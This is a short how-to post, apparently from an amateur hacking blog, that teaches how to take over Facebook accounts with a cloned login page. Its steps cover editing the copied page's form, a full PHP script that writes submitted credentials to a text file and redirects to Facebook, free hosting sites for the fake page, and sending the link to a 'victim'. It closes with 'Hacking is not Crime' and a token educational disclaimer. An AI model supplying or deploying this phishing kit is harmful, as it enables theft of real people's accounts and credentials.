Facebook hacking using Phishing method

Today we will learn about how to hack a facebook account and any other type of account using the phishing method.

we need two things.
  1. Facebook login page.
  2. A Phishing Script.
so,follow as this step.

step1 : Go to facebook login page.

step2 : Right click on page ..as show in image.


Facebook hacking using Phishing method  

step3 : Open notepad and copy all code in notpad after find (CTRL+F) as like show in image 

 Facebook hacking using Phishing method  

step4 : Remove this part and write as like this.

Facebook hacking using Phishing method

and save it index.html

step5 : Open notepad and write this code in notepad

code is :

<?
header("Location:http://www.facebook.com/");
$handle = fopen("ms.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


and save it password.php
 so now you have 2 files.
  1. index.html
  2. password.php
step6 :  Now we need a hosting site for upload a fake page ..
           here is a free hosting site name
            000webhost.com , ripway.com , 110mb.com , 0fees.net , t35.com , my3gb.com etc..
so make a account on any of them and login .

step7 : Now upload this 2 files  ( index.html , password.php ).
now open your site u get a login page..your fake page is ready.

step8 : Send this link your victim.

Enjoy the moment...
Hacking is not Crime........

WARNING:THIS IS FOR EDUCATIONAL PURPOSES ONLY...............I DO NOT STAND RESPONSIBLE FOR ANY HARM THAT OCCURS TO YOUR COMPUTER OR YOURSELF OR ANYONE DUE TO THE POSSESSION OF THIS INFORMATION.